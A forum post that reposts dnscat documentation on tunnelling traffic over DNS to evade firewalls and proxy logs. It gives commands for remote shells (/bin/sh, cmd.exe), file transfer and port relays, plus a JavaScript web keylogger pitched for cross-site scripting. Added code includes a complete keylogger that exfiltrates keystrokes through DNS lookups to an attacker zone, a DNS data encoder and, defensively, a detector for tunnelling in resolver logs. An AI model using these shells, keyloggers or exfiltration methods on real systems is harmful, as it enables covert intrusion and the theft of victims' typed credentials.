begood

[A+] From netcat to dnscat & web keylogger (js)


Intro

dnscat is designed in the spirit of netcat, allowing two hosts over the Internet to talk to each other. The major difference between dnscat and netcat, however, is that dnscat routes all traffic through the local (or a chosen) DNS server. This has several major advantages:

* Bypasses pretty much all network firewalls: the client only ever talks to its local resolver, and outbound DNS is almost always allowed

* Bypasses many local firewalls, for the same reason

* Doesn't pass through the typical gateway/proxy and therefore is stealthy as far as proxy and web logs are concerned (the resolver still sees every query)
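A caveat on the "stealthy" point, in the form of an added example that is not part of the original post or of dnscat: nothing crosses the proxy, but every chunk is a query that the recursive resolver sees and may log, and the encoded names look nothing like ordinary lookups. The script below aggregates constructed resolver log lines per zone and flags zones that receive many distinct, unusually long subdomains. The log format, the thresholds and the "zone = last two labels" rule are assumptions made for illustration.

```javascript
// Added example, not part of dnscat or of the original post: a resolver-log
// heuristic for the traffic pattern dnscat produces. The log lines, their
// format, the thresholds and the "zone = last two labels" rule are all
// assumptions for illustration (real code would use the public suffix list).

// Deterministic pseudo-random hex so the constructed sample is reproducible.
function fakeHex(seed, len) {
  let x = ((seed + 1) * 2654435761) >>> 0, s = '';
  while (s.length < len) {
    x = (Math.imul(x, 1103515245) + 12345) >>> 0;
    s += (x >>> 28).toString(16);          // top nibble -> one hex digit
  }
  return s;
}

// Constructed resolver log: "<time> <client> <qname> <qtype>". Four ordinary
// lookups, then six dnscat-style names under one zone.
const TUNNEL_ZONE = 'skullseclabs.org';
const SAMPLE_LOG = [
  '2010-03-02T10:00:01Z 10.0.0.5 www.google.com A',
  '2010-03-02T10:00:02Z 10.0.0.5 mail.google.com A',
  '2010-03-02T10:00:02Z 10.0.0.7 update.microsoft.com A',
  '2010-03-02T10:00:03Z 10.0.0.7 www.skullsecurity.org A',
  ...Array.from({ length: 6 }, (_, i) =>
    `2010-03-02T10:00:0${4 + i}Z 10.0.0.9 ` +
    `${i.toString(16).padStart(2, '0')}.${fakeHex(i, 60)}.${TUNNEL_ZONE} A`),
];

function parseLine(line) {
  const [time, client, qname, qtype] = line.trim().split(/\s+/);
  return { time, client, qname: qname.toLowerCase(), qtype };
}
const zoneOf = qname => qname.split('.').slice(-2).join('.');
const subdomainOf = qname => qname.split('.').slice(0, -2).join('.');

// Shannon entropy in bits per character; reported to help tune thresholds,
// not used by the rule below.
function entropyBits(s) {
  const counts = new Map();
  for (const c of s) counts.set(c, (counts.get(c) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) { const p = n / s.length; h -= p * Math.log2(p); }
  return h;
}

// Per-zone features: query count, distinct names, mean subdomain length.
function summarize(lines) {
  const byZone = new Map();
  for (const { qname } of lines.map(parseLine)) {
    const zone = zoneOf(qname);
    const sub = subdomainOf(qname);
    const s = byZone.get(zone) || { zone, queries: 0, names: new Set(), subLen: 0, entropy: 0 };
    s.queries++;
    s.names.add(qname);
    s.subLen += sub.length;
    s.entropy += entropyBits(sub);
    byZone.set(zone, s);
  }
  return [...byZone.values()].map(s => ({
    zone: s.zone,
    queries: s.queries,
    distinct: s.names.size,
    meanSubLen: s.subLen / s.queries,
    meanEntropy: s.entropy / s.queries,
  }));
}

// Rule: many distinct names AND long subdomains under one zone. CDNs also
// generate many distinct names, but their labels stay short.
const THRESHOLDS = { distinct: 5, meanSubLen: 40 };   // assumed; tune per site
function flagTunnels(lines, t = THRESHOLDS) {
  return summarize(lines)
    .filter(s => s.distinct >= t.distinct && s.meanSubLen >= t.meanSubLen)
    .map(s => s.zone);
}

console.log(flagTunnels(SAMPLE_LOG));   // constructed sample -> [ 'skullseclabs.org' ]
```

Run it against real resolver logs by replacing SAMPLE_LOG with the lines from your own format and adjusting parseLine; the thresholds are the part that needs tuning, since a single noisy CDN or anti-virus update zone can look similar on distinct-name count alone.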

There are a lot of advantages to using the DNS protocol. There are, of course, several disadvantages as well:

* Data has to be encoded into a DNS-safe alphabet: hostname labels allow letters (compared case-insensitively, so case carries no information), digits and hyphens, with at most 63 characters per label and 253 for the whole name

* DNS is slow -- it's not a direct connection; every chunk is a separate query and response relayed by one or more recursive resolvers

* The possibility of annoying DNS providers with the amount of traffic being sent through them (every chunk is a new, uncacheable lookup for your domain)

* dnscat requires the listener to be an authoritative DNS server
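To make the encoding constraint concrete, here is an added example (my own code, not dnscat's; dnscat's actual wire format is not described on this page) that packs arbitrary bytes into DNS-legal query names under a zone and recovers them on the receiving side. It uses hex rather than a case-sensitive alphabet, respects the 63-character label and 253-character name limits, and prefixes each name with a sequence label so that resolver caching and reordering don't corrupt the stream. The one-byte sequence label and the zone skullseclabs.org from the examples further down are assumptions.

```javascript
// Added example, not dnscat's own code: pack arbitrary bytes into DNS-legal
// query names under a zone you control, and unpack them on the receiving side.
// Assumptions: the zone 'skullseclabs.org' from the examples on this page, and
// my own framing (one hex byte of sequence number as the first label).

const MAX_LABEL = 63;   // RFC 1035: a label is at most 63 characters
const MAX_NAME = 253;   // longest name in presentation form (dots included)

// Hex is the simplest DNS-safe alphabet: [0-9a-f] survives the case folding
// that resolvers may apply, which base64's upper/lower distinction would not.
function toHex(bytes) {
  return Array.from(bytes, b => b.toString(16).padStart(2, '0')).join('');
}
function fromHex(hex) {
  const out = new Uint8Array(hex.length / 2);
  for (let i = 0; i < out.length; i++) out[i] = parseInt(hex.slice(2 * i, 2 * i + 2), 16);
  return out;
}

// Budget per query: name = "ss." + data labels + "." + zone. With k full data
// labels that is 3 + 64k + zone.length characters, which must stay <= 253.
function payloadBytesPerQuery(zone) {
  const labels = Math.floor((MAX_NAME - 3 - zone.length) / (MAX_LABEL + 1));
  return Math.floor((labels * MAX_LABEL) / 2);   // two hex chars per byte
}

// How noisy a transfer is: queries needed per kilobyte of payload.
function queriesPerKilobyte(zone) {
  return Math.ceil(1024 / payloadBytesPerQuery(zone));
}

// Split `bytes` (a Uint8Array) into a list of query names for `zone`.
function encode(bytes, zone) {
  const chunk = payloadBytesPerQuery(zone);
  const names = [];
  for (let off = 0, seq = 0; off < bytes.length; off += chunk, seq++) {
    const hex = toHex(bytes.subarray(off, off + chunk));
    const labels = hex.match(new RegExp(`.{1,${MAX_LABEL}}`, 'g'));
    // The sequence label keeps every name unique (resolvers cache repeats)
    // and lets the receiver restore order. One byte limits a stream to 256
    // chunks; a real tool needs a wider counter or a session/ack scheme.
    const name = [toHex([seq & 0xff]), ...labels, zone].join('.');
    if (name.length > MAX_NAME) throw new Error(`name too long: ${name.length}`);
    names.push(name);
  }
  return names;
}

// Reassemble the payload from whatever names reached the authoritative server,
// in any order and any case; names outside our zone are ignored.
function decode(names, zone) {
  const suffix = '.' + zone.toLowerCase();
  const chunks = names
    .map(n => n.toLowerCase())
    .filter(n => n.endsWith(suffix))
    .map(n => n.slice(0, -suffix.length).split('.'))
    .sort((a, b) => parseInt(a[0], 16) - parseInt(b[0], 16))
    .map(labels => fromHex(labels.slice(1).join('')));
  const out = new Uint8Array(chunks.reduce((n, c) => n + c.length, 0));
  let off = 0;
  for (const c of chunks) { out.set(c, off); off += c.length; }
  return out;
}

// Demo: round-trip a shell banner through query names for skullseclabs.org.
const ZONE = 'skullseclabs.org';
const sample = new TextEncoder().encode('uid=0(root) gid=0(root)\n');
const wire = encode(sample, ZONE);
const back = new TextDecoder().decode(decode(wire, ZONE));
console.log(wire, back, queriesPerKilobyte(ZONE));
```

With a 16-character zone the arithmetic gives 94 payload bytes per query, so a kilobyte costs 11 lookups and a megabyte over eleven thousand, which is the "annoying DNS providers" point in numbers. A longer zone name shrinks the budget further.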

The last point is very important. To actually receive DNS traffic, you require either:

1. An authoritative nameserver for a domain (or subdomain) you control, with that domain's NS record pointing at the host running the dnscat server, preferably one that isn't being used for anything else. This is what I'll be assuming for the rest of the documentation (see the next section for far more information)

2. The ability to connect to the dnscat server on udp/53 directly from the client (use the --dns flag to point at it) -- this is far less interesting, since it needs a firewall hole that ordinary DNS traffic does not, but it will be faster if it works

One of the key netcat-like components of dnscat is the -e (or --exec) argument, which runs a program (such as /bin/sh or cmd.exe) and redirects its input and output through the connection. The --exec flag can be used on the client or server.

dnscat has been tested on, in alphabetical order:

* FreeBSD 7.2

* FreeBSD 8.0

* FreeBSD 8.0 amd64

* Mac OS X 10.4 (I think)

* Slackware 13

* Slackware 13-64

* Windows 2000

* Windows 2003

* Windows XP

It should work on any modern version of Linux, FreeBSD, or Windows.

To start a dnscat server, use the following command line:

dnscat --listen

To start a dnscat client, use this command line:

dnscat --domain <domain>

For example:

dnscat --domain skullseclabs.org

You can also specify the DNS server to use with the --dns argument, either because the correct one wasn't chosen automatically, or because you don't have an authoritative nameserver and want to send the queries directly to the dnscat server on UDP/53:

dnscat --domain skullseclabs.org --dns 4.2.2.1

Remember that the server has to be the authoritative nameserver for the domain given by the client, unless the --dns entry points directly to the dnscat server.

For more options, use --help:

dnscat --help

Remote shell

Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before:

dnscat --listen

And run the shell on the client side:

Linux/BSD:

dnscat --domain skullseclabs.org --exec "/bin/sh"

Windows:

dnscat.exe --domain skullseclabs.org --exec "cmd.exe"

On the server, you can now type commands and they'll run on the client side.

Transfer a file

You can transfer a file from the client to the server like this:

Server:

dnscat --listen > file.out

Client:

dnscat --domain <domain> < file.in

You can change the direction that the file goes by switching around the redirects. To transfer from the server to the client, do this:

Server:

dnscat --listen < file.in

Client:

dnscat --domain <domain> > file.out

A couple of things to note:

* No integrity checking is performed, so compare a hash (md5sum or sha1sum) of file.in and file.out afterwards

* There is currently no indication when a transfer is finished; watch the output file stop growing, then kill the sending side

Tunnel another connection

This is my favourite thing to do, and it works really slick. You can use netcat to open a port-to-port tunnel through dnscat. I like this enough that I'm going to add netcat-like arguments in the next version.

Let's say that the client can connect to an ssh server on 192.168.2.100. The server is on an entirely different network and normally has no access to 192.168.2.100. The whole situation is a little confusing because we want the dnscat client to connect to the ssh server (presumably, in real life, we'd be able to get a dnscat client on a target network, but not a dnscat server). "client" and "server" are such ancient terms anyways. I prefer to look at them as the sender and the receiver.

A diagram might help:


ssh client
|
| (port 1234 via netcat)
|
v
dnscat server
^
|
| (DNS server(s))
|
dnscat client
|
| (port 22 via netcat)
|
v
ssh server

It's like a good ol' fashioned double netcat relay. Ed Skoudis would be proud. :)

First, on the dnscat server, we start netcat via --exec, listening on port 1234 (traditional netcat syntax; the OpenBSD netcat takes the port number without -p):

dnscat --listen --exec "nc -l -p 1234"

If you connect to that host on port 1234, all data will be forwarded across DNS to the dnscat client.

Second, on the client side, dnscat connects to 192.168.2.100 port 22:

dnscat --domain skullseclabs.org --exec "nc 192.168.2.100 22"

This connects to 192.168.2.100 on port 22. The input/output will both be sent across DNS back to the dnscat server, which will then send the traffic to whomever is connected on TCP/1234.

Third and finally, we ssh to our socket:

ssh -p 1234 ron@127.0.0.1

One thing to note: at the moment, doing this is slooooow. But it works, and it's really, really cool!

Web keylogger

There is an implementation of dnscat in Javascript (jsdnscat) written by Stefan Penner. It's located in the 'samples' folder of nbtool and consists of two libraries, one for keylogging and the other for dnscat. There are several example HTML files for using these, but it really comes down to these lines:

<script type='text/javascript' src='js/skullsecurity.all.min.js'></script>
<script type='text/javascript'>
SkullSecurity.jsdnscat.config.host = 'yourdomain.com';
SkullSecurity.keylogger.start(SkullSecurity.jsdnscat.send);
</script>

Equivalent code can easily be put into a .js file and hosted on your server for easy use with cross-site scripting.

The best reason for using this as opposed to traditional avenues for data exfiltration is to get around logging and firewalls: the browser has to resolve the hostname before it can make the HTTP request, and the encoded data rides in that DNS query. Because the dnscat server answers every A and AAAA request with a localhost address, the HTTP request then goes to 127.0.0.1 on the victim's own machine rather than out to the network, so nothing reaches the proxy or the web logs, yet you still get the data. (The lookup itself is still visible to whoever runs or logs the resolver.)
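The snippet above is the page's own. As an added example that is not jsdnscat's code (jsdnscat's wire format is not shown on this page), here is a minimal keylogger of the same shape: keystrokes are buffered, hex-encoded into a hostname under the attacker's zone, and "sent" by making the browser resolve that hostname. The zone yourdomain.com comes from the snippet above; the session label, the four-digit sequence counter, the flush-on-label-size rule and the Image() transport are my assumptions.

```javascript
// Added example, not jsdnscat's code: a keystroke exfiltrator that carries
// its data in DNS lookups. Assumptions: zone 'yourdomain.com' from the page's
// snippet; the 'cafe' session label, 4-hex-digit sequence counter and the
// Image() transport are mine.

const EXFIL_ZONE = 'yourdomain.com';
const MAX_LABEL = 63;   // a DNS label may not exceed 63 characters

// Hex-encode the UTF-8 bytes of a string: DNS folds case, so hex is safe.
function hex(str) {
  return Array.from(new TextEncoder().encode(str),
                    b => b.toString(16).padStart(2, '0')).join('');
}

// Lookup name: <seq>.<hex keys>.<session>.<zone>. The sequence label makes
// every name unique, so resolver caches cannot swallow a repeated keystroke
// burst, and the receiver can put bursts back in order.
function beaconName(keys, seq, session, zone) {
  return [seq.toString(16).padStart(4, '0'), hex(keys), session, zone].join('.');
}

// Buffer keys and flush when the next key would push the data label past
// 63 characters (a non-ASCII key costs more than one byte, so size is
// checked on the encoded form, not on the key count).
function makeLogger({ send, zone = EXFIL_ZONE, session = 'cafe' }) {
  let buf = '', seq = 0;
  const flush = () => {
    if (!buf) return null;
    const name = beaconName(buf, seq++, session, zone);
    buf = '';
    send(name);
    return name;
  };
  return {
    key(ch) {
      let sent = null;
      if (hex(buf + ch).length > MAX_LABEL) sent = flush();
      buf += ch;
      return sent;      // the name that went out, or null if still buffering
    },
    flush,
  };
}

// Browser transport: setting an image source to http://<name>/ forces a DNS
// lookup for <name>, which is where the data leaves. The attacker's server
// answers 127.0.0.1, so the TCP connection goes to the victim's own loopback
// and nothing crosses the proxy. The failed image load is harmless.
function sendViaImage(name) {
  const img = new Image();
  img.src = 'http://' + name + '/';
}

// Page wiring, guarded so the module also loads outside a browser.
if (typeof document !== 'undefined') {
  const logger = makeLogger({ send: sendViaImage });
  document.addEventListener('keypress', e => logger.key(e.key));
  setInterval(logger.flush, 2000);                       // periodic flush
  window.addEventListener('beforeunload', logger.flush);  // last burst
}
```

On the receiving side the authoritative server only needs to log query names for the zone and answer A/AAAA with a localhost address; the resolver's query log is the one place this still shows up, which is the same caveat as for dnscat proper.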


download : Dnscat - Skull Security

jsdnscat : http://svn.skullsecurity.org:81/ron/security/nbtool-0.04/samples/jsdnscat/

Edited by begood
